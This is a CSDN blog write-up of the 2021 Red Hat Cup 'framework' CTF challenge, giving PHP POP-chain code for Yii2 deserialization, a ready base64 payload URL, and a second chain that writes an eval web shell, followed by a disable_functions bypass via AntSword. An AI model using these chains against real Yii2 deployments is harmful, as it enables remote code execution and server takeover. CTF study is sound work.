2021红帽杯 framework

最新推荐文章于 2021-11-28 12:29:12 发布
最新推荐文章于 2021-11-28 12:29:12 发布
阅读量309 收藏 1
点赞数
分类专栏: # BUUCTF-Web 文章标签: yii反序列化 ctf 2021红帽杯 web安全 新星计划
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/118120752
版权

2021红帽杯 framework

考点

yii反序列化

思路

直接 /www.zip发现源码,直接拷贝下来本地运行
yii反序列化可以看看我之前的分析:文章链接
phpinfo中可以发现:system、eval之类的一些函数好像都没有效果,设置了disable_functions;assert能用、file_put_contents()也能用

Payload

POC链

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'phpinfo';
            $this->id = '5';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction, 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

Payload

?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NzoicGhwaW5mbyI7czoyOiJpZCI7czoxOiI1Ijt9aToxO3M6MzoicnVuIjt9fX19

在这里插入图片描述

POC链

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents(\'shell.php\',\'<?php eval($_POST[1]);?>\');';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

上蚁剑,用插件,phpinfo的信息显示这里是Apache/2.4.6 (CentOS) PHP/5.6.40,选择Apache_mod_cgi

H3rmesk1t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
2019红帽杯恶臭的数据包.7z
11-11
2019红帽杯恶臭的数据包
红帽杯2021_web_部分
ScyLamb的博客
05-10 1260
find_it 首页没发现东西,尝试robots.txt 发现 1ndexx.php 但无法访问 1ndexx.php 尝试继续找信息泄露,最后找到 .1ndexx.php.swp <?php $link = mysql_connect('localhost', 'root'); ?> <html> <head> <title>Hello worldd!</title> <style> body { background-co
[HMBCTF 2021]EzLight 复现
feng的博客
05-18 916
前言 去突击了一个星期的计算方法期末考试,中间耽误了很多比赛题目的复现。今年红帽最后的那道EzLight赛后也有了writeup,直到今天才有时间去复现一下。 参考了郭院士和颖奇师傅的文章: lightcms后台RCE漏洞挖掘 lightcms全版本后台rce 0day分析 他们的文章讲的已经非常非常的详细了,因此我这里就不做过多的解释了。就是跟着大师傅们的思路,也自己把这个代码的流程看了一遍,因此我这篇文章其实没啥看的,就是我自己记录一下我的复现过程,师傅们看郭院士和颖奇师傅的文章就可以了。 复现 网上直
2021红帽杯线上解题记录
shutdown -s -t
11-28 3143
签到 如题目名称提示,需要进行ebcdic编码,python原生不支持,安装额外库pip install ebcdic。python3解码脚本如下: import ebcdic with open('EBCDIC.txt', 'rb') as f: tmp = f.read() print(tmp.decode('cp1141')) 输出内容flagäwe1c0me_t0_redhat2021ü,调整一下flag{we1c0me_t0_redhat2021}。 find-it flag
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 9941
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
2019年第三届红帽杯线上赛wp
SkYe's Blog
11-16 1562
2019年第三届红帽杯线上赛wp PWN three IDA打开之后,函数名都是sub_xxx,然后通过nc官方部署的程序(或本地在程序所在目录创建flag文件后),获得程序中会出现的字符串定位到了重要函数,我用的是字符串Maybe is good。 贴出来一下重要函数对应的内存地址: 函数名(已重命名) 内存地址 main 0x08048CA8 load_flag 0x080...
2021第四届红帽杯网络安全大赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛 - 线上赛 Writeup 第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛-
2018红帽杯线上预选赛MISC文件--NotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
05-03
2018红帽杯线上预选赛MISC文件()Not Only WiresharkNotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
红帽RHCSA的详尽笔记
08-15
红帽RHCSA的详尽笔记打算要考RHCSA然后报了一个班,这是我自己记录的笔记,我感觉挺详细的,希望对你们有帮助,包括配置网卡、yum源、创建用户、用户组、创建cron作业等等,可以搭配我的文章一起看,对初学Linux和考...
利用fastcoll实现MD5碰撞
LYJ20010728的博客
03-07 2493
源码: <?php show_source(__FILE__); class CDUTSEC { public $var1; public $var2; function __construct($var1, $var2) { $var1 = $var1; $var2 = $var2; } function __destruct() { echo md5($this->var1);
[极客大挑战 2020]Greatphp
LYJ20010728的博客
05-31 1654
[极客大挑战 2020]Greatphp考点思路Payload 考点 PHP原生类利用、PHP反序列化、md5()和sha1()对类进行hash触发__toString方法 思路 进入题目,分析源码,题目绕过类型第一眼看上去在ctf的基础题目中非常常见,一般情况下只需要使用数组即可绕过,但是由于这里是在类里面,我们不能这么做 所以我们可以使用含有 __toString 方法的PHP内置类来绕过,用的两个比较多的内置类就是 Exception 和 Error ,他们之中有一个 __toString 方
HFCTF-2021-Final-easyflask
LYJ20010728的博客
05-31 1638
HFCTF-2021-Final-easyflask考点思路Payload 考点 Python os.path.join trick、环境变量暴露敏感信息、pickle 反序列化 RCE、Flask Session 伪造 思路 进入题目,hint提示/file?file=index.js,进去之后又提示Source at /app/source,获得源码信息 注意 /file 路由,用户上传的 path 会被拼接到 static 目录后面,这里有个trick,当 os.path.join 的第二个参
Exception类绕过md5、sha1等
LYJ20010728的博客
03-07 1302
源码: <?php show_source(__FILE__); class CDUTSEC { public $var1; public $var2; function __construct($var1, $var2) { $var1 = $var1; $var2 = $var2; } function __destruct() { echo md5($this->var1);
[羊城杯 2020]EasySer
LYJ20010728的博客
05-17 1240
[羊城杯 2020]EasySerEasySer考点思路Payloadeasyphp考点思路Payload EasySer 考点 1) PHP 基础代码审计 2) SSRF本地文件读取 3) 反序列化写入webshell,绕过死亡绕过 思路 1) 源码写了不安全协议从本地,想到http 和127.0.0.1 2) 读源码看反序列化,写入shell 3) 伪协议base64绕过die(),rot13等等都可以 Payload buuctf上做这道题时,页面让我一脸茫然,一度怀疑环境坏了… 没啥
[羊城杯 2020]easyphp
LYJ20010728的博客
05-17 1173
[羊城杯 2020]easyphpeasyphp考点思路Payload easyphp 考点 .htaccess的利用 思路 在目录下,只有index.php能够作为php解析执行,于是我们可以写一个.htaccess让index.php自动包含执行代码; 思路一:向.htaccess文件写入shell,并且用auto_prepend_file包含.htaccess,但是file关键字被ban了,可以用换行绕过,结尾要用\处理content中的\n; 思路二:利用.htaccess文件特性,不过这次是
2021红帽杯 find_it
LYJ20010728的博客
06-22 1027
2021红帽杯 find_it考点思路Payload 考点 备份文件、源码泄露 思路 题目提示我们 I Can't view my php files?!,猜测是备份文件,御剑扫一下发现存在 robots.txt 访问 1ndexx.php,发现并不存在;由于Linux平台下的存在 .xxxx.php.swp、.xxxx.php.swo、.xxxx.php等文件格式,尝试访问一下 .1ndexx.php.swp,存在源码泄露 发现过滤了一堆东西,感觉没得啥子可以利用的点了,由于可以写入文件,
虚拟机红帽Linux安装
最新发布
10-08
虚拟机中安装红帽Linux可以按照以下步骤进行操作: 1. 首先,确保你已经安装了虚拟机软件,比如VMware Workstation或者Oracle VirtualBox。 2. 下载红帽Linux的ISO镜像文件,可以从红帽官网下载或者其他可信的来源...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值